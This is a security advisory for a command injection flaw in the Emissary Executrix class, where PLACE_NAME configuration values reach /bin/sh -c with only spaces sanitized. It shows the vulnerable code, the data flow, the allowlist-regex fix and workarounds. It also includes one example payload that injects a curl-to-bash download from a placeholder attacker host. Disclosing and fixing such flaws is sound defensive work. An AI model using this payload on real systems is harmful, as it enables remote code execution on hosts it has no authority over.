Launch Week Day 1: Announcing Security Design Review
Start for Free
HIGH 7.2 Maven

Emissary has a Command Injection via PLACE_NAME Configuration in Executrix

GHSA-6c37-7w4p-jg9v · CVE-2026-35581

Published · Modified

Description

Summary

The Executrix utility class constructed shell commands by concatenating
configuration-derived values — including the PLACE_NAME parameter — with
insufficient sanitization. Only spaces were replaced with underscores, allowing
shell metacharacters (;, |, $, `, (, ), etc.) to pass through
into /bin/sh -c command execution.

Details

Vulnerable code — Executrix.java

Insufficient sanitization (line 132):

this.placeName = this.placeName.replace(' ', '_');
// ONLY replaces spaces — shell metacharacters pass through

Shell sink (line 1052–1058):

protected String[] getTimedCommand(final String c) {
    return new String[] {"/bin/sh", "-c", "ulimit -c 0; cd " + tmpNames[DIR] + "; " + c};
}

Data flow

  1. PLACE_NAME is read from a configuration file
  2. Executrix applies only a space-to-underscore replacement
  3. The placeName is used to construct temporary directory paths (tmpNames[DIR])
  4. tmpNames[DIR] is concatenated into a shell command string
  5. The command is executed via /bin/sh -c

Example payload

PLACE_NAME = "test;curl attacker.com/shell.sh|bash;x"

After the original sanitization: test;curl_attacker.com/shell.sh|bash;x
(semicolons, pipes, and other metacharacters preserved)

Impact

  • Arbitrary command execution on the Emissary host
  • Requires the ability to control configuration values (e.g., administrative
    access or a compromised configuration source)

Remediation

Fixed in PR #1290,
merged into release 8.39.0.

The space-only replacement was replaced with an allowlist regex that strips all
characters not matching [a-zA-Z0-9_-]:

protected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile("[^a-zA-Z0-9_-]");

protected static String cleanPlaceName(final String placeName) {
    return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll("_");
}

This ensures that any shell metacharacter in the PLACE_NAME configuration
value is replaced with an underscore before it can reach a command string.

Tests were added to verify that parentheses, slashes, dots, hash, dollar signs,
backslashes, quotes, semicolons, carets, and at-signs are all sanitized.

Workarounds

If upgrading is not immediately possible, ensure that PLACE_NAME values in all
configuration files contain only alphanumeric characters, underscores, and hyphens.

References

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes